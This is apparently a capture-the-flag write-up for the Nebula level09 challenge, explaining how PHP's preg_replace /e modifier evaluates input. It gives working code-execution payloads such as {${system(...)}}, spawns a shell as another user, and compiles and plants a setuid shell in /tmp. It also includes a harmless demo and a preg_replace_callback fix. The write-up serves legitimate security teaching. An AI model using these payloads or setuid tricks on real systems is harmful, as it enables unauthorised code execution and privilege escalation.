Source code:
The vulnerability is clearly the /e (PREG_REPLACE_EVAL) pattern modifier in preg_replace: after substituting the backreferences, PHP evaluates the replacement string as PHP code and uses the result as the replacement. (The modifier was deprecated in PHP 5.5 and removed in 7.0, but the Nebula VM runs PHP 5.)
The purpose of the code seems to be obfuscating email addresses into a format that spambots won't harvest. Let's try to use it:
level09@nebula:~$ cat << EOF > lethal_data
> [email dmolotov@mail.ru]
> [email [uberskill@mail.ru]]
> EOF
level09@nebula:~$ ~flag09/flag09 lethal_data null
dmolotov AT mail dot ru
<uberskill AT mail dot ru>

We can exploit the script using PHP's so-called complex (curly) syntax.
The captured email address is spliced into the replacement string as the argument to the 'spam' function, and that string is then evaluated as PHP code. Normally the capture is just an email address. Note that /e backslash-escapes any single quotes, double quotes and backslashes inside the substituted backreference, so we can't simply close the string literal and append our own statement. What we can do is leave the string literal intact and use complex syntax inside it: in a double-quoted string, {${expr}} evaluates expr (as a variable-variable lookup) while the string is being built, so anything we put there runs as PHP with no quotes required. That gives us arbitrary code execution as follows:
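To make the mechanism concrete, here is an added example (my own reconstruction, not the level's flag09.php): it spells out the two steps /e performed, backreference substitution with quotes escaped and then eval(), puts the hardened preg_replace_callback() form next to it, and uses a harmless marker() in place of system(). The spam() helper and the sample inputs are assumptions modelled on the post's description and its lethal_data files. It runs on PHP 7/8 where /e no longer exists; expect the same "Undefined variable" warning (plus a deprecation notice on 8.2+) that the level prints, because ${marker()} ends up looking up a variable whose name is marker()'s return value. The same string-building step is what the later $filename and bare-constant variants ride on.

```php
<?php
// Added example, not the flag09.php from the level. marker() stands in for
// system() so the demo is harmless to run.

// Assumed helper matching the post's description of spam().
function spam($email)
{
    $email = preg_replace('/\./', ' dot ', $email);
    $email = preg_replace('/@/', ' AT ', $email);
    return $email;
}

// What the /e modifier did on PHP 5.x: substitute the capture into the
// replacement template "spam(\"\\2\")" with ' " \ and NUL escaped, then eval()
// the result. /e was removed in PHP 7.0, so the two steps are done by hand.
function markup_eval($contents)
{
    return preg_replace_callback('/(\[email (.*)\])/', function ($m) {
        $code = 'return spam("' . addslashes($m[2]) . '");'; // the string /e built
        return eval($code);                                  // attacker text is now PHP
    }, $contents);
}

// Hardened form: the capture is handed to spam() as data and never parsed.
function markup_safe($contents)
{
    return preg_replace_callback('/\[email (.*)\]/', function ($m) {
        return spam($m[1]);
    }, $contents);
}

// Records that attacker-chosen code ran; returns '' like a quiet system() call.
$GLOBALS['executed'] = false;
function marker()
{
    $GLOBALS['executed'] = true;
    return '';
}

// Constructed inputs mirroring the post's lethal_data files.
$benign  = '[email dmolotov@mail.ru]' . "\n";
$payload = '[email {${marker()}}]' . "\n";   // same shape as {${system($use_me)}}

echo markup_eval($benign);          // dmolotov AT mail dot ru
markup_eval($payload);              // "{${marker()}}" is parsed as a double-quoted string
var_dump($GLOBALS['executed']);     // bool(true): marker() ran inside eval()

$GLOBALS['executed'] = false;
echo markup_safe($payload);         // {${marker()}} comes back as literal text
var_dump($GLOBALS['executed']);     // bool(false)
```

The fix is not "escape harder": addslashes() is already applied in the vulnerable path and does nothing against complex syntax. The only safe route is to never evaluate the replacement at all, which is exactly what preg_replace_callback() gives you.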
level09@nebula:~$ cat > lethal_data
[email {${system($use_me)}}]
level09@nebula:~$ ~flag09/flag09 lethal_data getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

The notice is harmless and actually confirms what happened: $use_me is the script's second argument, system() returns the last line of the command's output, and ${...} then tries to look up a variable with that name. Or you could even get a shell with the EUID of flag09:

level09@nebula:~$ ~flag09/flag09 lethal_data sh
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account

But why settle for that when we can even have a SUID shell :)
level09@nebula:~$ cat > /tmp/shell.c
#define _GNU_SOURCE   /* setresuid() is a GNU extension; needed for its prototype in unistd.h */
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    /* The binary will carry the setuid bit, so EUID is flag09 while the real UID
       is still level09. Copy the EUID into all three UIDs so the child shell
       (which may drop privileges if real != effective) runs fully as flag09. */
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level09@nebula:~$ make /tmp/shell
cc /tmp/shell.c -o /tmp/shell
level09@nebula:~$ ~flag09/flag09 lethal_data 'cp /tmp/shell /tmp/flag09_sh; chmod +s /tmp/flag09_sh'
PHP Notice:  Undefined variable:  in /home/flag09/flag09.php(15) : regexp code on line 1
level09@nebula:~$ /tmp/flag09_sh
sh-4.2$ id
uid=990(flag09) gid=1010(level09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account

Because cp ran with EUID flag09, the copy is owned by flag09, so the setuid bit hands out that user; the setgid bit that chmod +s also sets changes nothing, since the file's group is still level09.

There are even other ways to exploit the vulnerability. For instance, we don't need to rely on the $use_me variable at all. We could use $filename (the script's first argument) and execute the input data itself:
level09@nebula:~$ cat > lethal_data
sh # [email {${system($filename)}}]
level09@nebula:~$ chmod +x lethal_data
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account

The file does double duty: PHP only cares about the [email ...] part, while to /bin/sh everything after # is a comment and the line just runs sh. Passing ./lethal_data rather than lethal_data matters, because system() hands the name to a shell, which would otherwise search PATH instead of the current directory.

Or we could use some PHP black magic and hardcode the command without quotes directly:

level09@nebula:~$ cat > lethal_data
[email {${system(sh)}}]
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
PHP Notice:  Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account

This relies on PHP 5 treating the bare word sh as an undefined constant and falling back to the string 'sh' with only a notice; PHP 7.2 deprecated that fallback and PHP 8 throws an Error instead, so it is specific to old interpreters like the one on this VM.

We got the flag by exploiting the same vulnerability with three different methods :)
~ Dmitry